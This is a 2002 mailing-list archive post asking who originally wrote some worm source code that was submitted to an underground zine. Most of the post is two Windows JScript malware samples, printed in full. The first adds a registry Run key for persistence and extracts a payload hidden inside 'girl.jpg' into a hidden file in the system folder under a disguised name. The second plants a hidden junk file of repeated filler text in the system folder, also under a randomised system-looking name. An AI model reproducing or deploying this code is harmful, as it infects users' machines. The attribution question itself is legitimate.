Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Stolen source?

From: "Arturo \"Buanzo\" Busleiman" <buanzo () buanzo com ar>
Date: Mon, 18 Mar 2002 01:13:29 -0300 (ART)
Hi!

Do you recognize this source code? Can you tell which is the real/original
author?

I explain: I am a member of the Raregazz Team, we produce (!) series of
underground-related articles. On the 18th edition, a non-member send us an
article which was half-stolen from another author (not well known either
of them). Now, he is sending us another article, a source-code explanation
for a worm. This source code makes me remember of someone else's...

So, I would like to find:

a) the original author or at least
b) know if this source is not an original (i.e is stolen)

Thank you!

  var ob, ws, ws2, g, g2, t, yu, ly, f, f2;
  ob = new ActiveXObject("Scripting.FileSystemObject");
  ws = WScript.CreateObject ("WScript.Shell");
  n = ob.GetSpecialFolder(1)+"\\";
  yu = ran();
  ly = n+yu+".js";
  mai();
function mai(){
  ws2 = ws.RegRead("HKCU\\Control Panel\\Desktop\\MenuShowDelay");
if (ws2 != "auto"){
  ws.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"+yu, l
y, "REG_SZ");
  ws.RegWrite("HKCU\\Control Panel\\Desktop\\MenuShowDelay", "auto", "REG_SZ");
  g = ob.GetFile("girl.jpg");
  f = g.OpenAsTextStream(1, -2);
  g2 = f.ReadAll();
  g2 = g2.substring(31029, 32457);
  t = ob.OpenTextFile(ly, 2, true);
  t.Write(g2);
  t.Close();
  f2 = ob.GetFile(ly);
  f2.attributes = f2.attributes + 4;
  }
}

function ran(){
  rr = new Array(15);
  rr[0] ="$mstask"; rr[1] ="$command"; rr[2] ="$explorer"; rr[3] ="$alg"; rr[4]
 ="$logon"; rr[5] ="$ie"; rr[6] ="$icq"; rr[7] ="$win"; rr[8] ="$system"; rr[9]
 ="$sys"; rr[10] ="$scanreg"; rr[11] ="$yahoo"; rr[12] ="$msn"; rr[13] ="$clock
"; rr[14] ="$logger"; rr[15] ="$yl";
  var irr = rr[parseInt(Math.round(Math.random()*15))];
  return (irr);
}


/* second source code */

  var ob, f, f2, t, t2, n, w, ry0, ry1;
  ob = new ActiveXObject("Scripting.FileSystemObject");
  t = new Date();
  t2 = t.getHours()+t.getMinutes()+t.getSeconds();
  n = ob.GetSpecialFolder(1)+"\\";
  wrote();

function wrote(){
  ry0 = ran();
  ry1 = ran2();
  w = n+ry0+t2+ry1;
  f = ob.OpenTextFile(w, 2, true);
  for (q = 0; q < 1000; q++){rew();}
  f.Close();
  f2 = ob.GetFile(w);
  f2.attributes = f2.attributes + 4;
}

function ran(){
rr = new Array(15);
rr[0] ="mstask."; rr[1] ="command."; rr[2] ="explorer."; rr[3] ="alg."; rr[4] =
"logon."; rr[5] ="ie."; rr[6] ="leeme."; rr[7] ="win."; rr[8] ="system."; rr[9]
 ="sys."; rr[10] ="scanreg."; rr[11] ="icq."; rr[12] ="msn."; rr[13] ="clock.";
 rr[14] ="logger."; rr[15] ="yl.";
var irr = rr[parseInt(Math.round(Math.random()*15))];
return (irr);
}

function ran2(){
rr2 = new Array(15);
rr2[0] =".exe"; rr2[1] =".doc"; rr2[2] =".com"; rr2[3] =".bat"; rr2[4] =".tmp";
 rr2[5] =".xls"; rr2[6] =".ini"; rr2[7] =".inf"; rr2[8] =".vxd"; rr2[9] =".dll"
; rr2[10] =".htm"; rr2[11] =".cpl"; rr2[12] =".sys"; rr2[13] =".dat"; rr2[14] =
".yl"; rr2[15] =".hex";
var irr2 = rr2[parseInt(Math.round(Math.random()*15))];
return (irr2);
}

function rew(){

  f.Write(":::: GusanoDisk Y v5.recover ::::");
  f.Write("Creado :: "+ t2);
  f.WriteBlankLines(90);
  for (q = 0; q < 900; q++){f.Write("GusanoDisk Y by HeX. Gracias por sus
  megabytes.");
}
}
Previous By Date Next
Previous By Thread Next

Current thread: